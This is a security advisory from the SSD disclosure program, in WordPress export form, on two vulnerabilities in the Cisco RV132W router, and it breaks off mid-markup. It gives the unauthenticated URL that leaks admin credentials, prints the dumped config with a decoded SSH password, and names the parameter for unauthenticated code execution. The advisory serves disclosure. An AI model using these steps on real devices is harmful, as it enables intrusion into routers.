{"id":11439,"date":"2018-02-11T14:19:06","date_gmt":"2018-02-11T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5210\/"},"modified":"2018-02-11T14:19:06","modified_gmt":"2018-02-11T22:19:06","slug":"news-5210","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5210\/","title":{"rendered":"SSD Advisory \u2013 Hack2Win &#8211; Cisco RV132W Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Sun, 11 Feb 2018 06:10:03 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3590\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8.<\/p>\n<p>The Cisco RV132W Wireless-N ADSL2+ VPN Router is &#8220;easy to use, set up, and deploy. 
This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Information Disclosure That Leads to Password Disclosure<\/li>\n<li>Unauthenticated WAN Remote Code Execution<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> A security researcher from NHSC has reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Cisco were informed of the vulnerabilities and released patches to address them: https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20180207-rv13x<\/p>\n<p>CVE: CVE-2018-0125 \/ CVE-2018-0127<br \/> <span id=\"more-3590\"><\/span><\/p>\n<p><strong><u>Vulnerabilities details<\/u><\/strong><\/p>\n<p><strong>Information Disclosure that Leads to Password Disclosure<\/strong><br \/> User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c76384172900\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/[TARGET_IP]\/dumpmdm.cmd<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>The output includes the admin SSH password (base64-encoded):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c7d094175596\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;AdminUserName&gt;redalert&lt;\/AdminUserName&gt;   &lt;AdminPassword&gt;61eac78956b08e9b7c499691eddbe2e2&lt;\/AdminPassword&gt;   &lt;AdminPasswordHash&gt;(null)&lt;\/AdminPasswordHash&gt;   &lt;AdminCliEnable&gt;TRUE&lt;\/AdminCliEnable&gt;   &lt;SupportUserName&gt;support&lt;\/SupportUserName&gt;   &lt;SupportPassword&gt;support&lt;\/SupportPassword&gt;   &lt;SupportPasswordHash&gt;(null)&lt;\/SupportPasswordHash&gt;   &lt;SupportCliEnable&gt;TRUE&lt;\/SupportCliEnable&gt;   &lt;UserUserName&gt;user&lt;\/UserUserName&gt;   &lt;UserPassword&gt;user&lt;\/UserPassword&gt;   &lt;UserPasswordHash&gt;(null)&lt;\/UserPasswordHash&gt;   &lt;UserCliEnable&gt;TRUE&lt;\/UserCliEnable&gt;   &lt;logintimeout&gt;30&lt;\/logintimeout&gt;   &lt;SetAdminUser&gt;TRUE&lt;\/SetAdminUser&gt;   &lt;SetGuestUser&gt;FALSE&lt;\/SetGuestUser&gt;   &lt;EnableAdminUser&gt;TRUE&lt;\/EnableAdminUser&gt;   
&lt;EnableGuestUser&gt;FALSE&lt;\/EnableGuestUser&gt;   &lt;GuestUserName&gt;guest&lt;\/GuestUserName&gt;   &lt;GuestPassword&gt;574ea313a3b02211d193d01606942111&lt;\/GuestPassword&gt;   &lt;GuestPasswordHash&gt;(null)&lt;\/GuestPasswordHash&gt;   &lt;GuestCliEnable&gt;TRUE&lt;\/GuestCliEnable&gt;   &lt;GuestUserIsInUse&gt;FALSE&lt;\/GuestUserIsInUse&gt;   &lt;FirstLogin&gt;TRUE&lt;\/FirstLogin&gt;   &lt;GuestLoginTimeout&gt;30&lt;\/GuestLoginTimeout&gt;   &lt;loginchecked&gt;0&lt;\/loginchecked&gt;   &lt;sshpass&gt;cmVkYWxlcnQxMzIkAA==&lt;\/sshpass&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-12\">12<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5a80c15a63c7d094175596-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c7d094175596-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c15a63c7d094175596-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">redalert<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-2\"><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">61eac78956b08e9b7c499691eddbe2e2<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">AdminCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">AdminCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">support<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span 
class=\"crayon-v\">support<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SupportCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SupportCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserPassword<\/span><span 
class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">UserCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">UserCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-13\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">logintimeout<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logintimeout<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">SetAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SetAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span 
class=\"crayon-v\">SetGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">SetGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-16\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">EnableAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">EnableAdminUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-17\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">EnableGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">EnableGuestUser<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-18\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestUserName<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">guest<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestUserName<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-19\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestPassword<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">574ea313a3b02211d193d01606942111<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span 
class=\"crayon-v\">GuestPassword<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-20\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestPasswordHash<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestCliEnable<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-22\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestUserIsInUse<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">FALSE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestUserIsInUse<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-23\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">FirstLogin<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-t\">TRUE<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">FirstLogin<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-24\"><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">GuestLoginTimeout<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">30<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">GuestLoginTimeout<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c7d094175596-25\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">loginchecked<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">loginchecked<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c15a63c7d094175596-26\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">sshpass<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">cmVkYWxlcnQxMzIkAA<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sshpass<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p> Decoding: \u201ccmVkYWxlcnQxMzIkAA==\u201d base64-decodes to \u201credalert132$\u201d (followed by a trailing NUL byte), which is the password of our test unit.<\/p>\n<p><strong>Unauthenticated WAN Remote Code Execution<\/strong><br \/> User-controlled input is not sufficiently filtered; an unauthenticated user can access the following page:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c81213996576\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; 
line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/[TARGET_IP]\/tr69cfg.cgi<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c15a63c81213996576-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" 
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c15a63c81213996576-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/[TARGET_IP]\/tr69cfg.cgi<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0001 seconds] -->  <\/p>\n<p>By sending a POST request with a modified <em>tr69cBoundIfName=<\/em> parameter, an unauthenticated user can execute arbitrary code on the victim's router:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a80c15a63c84765906036\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
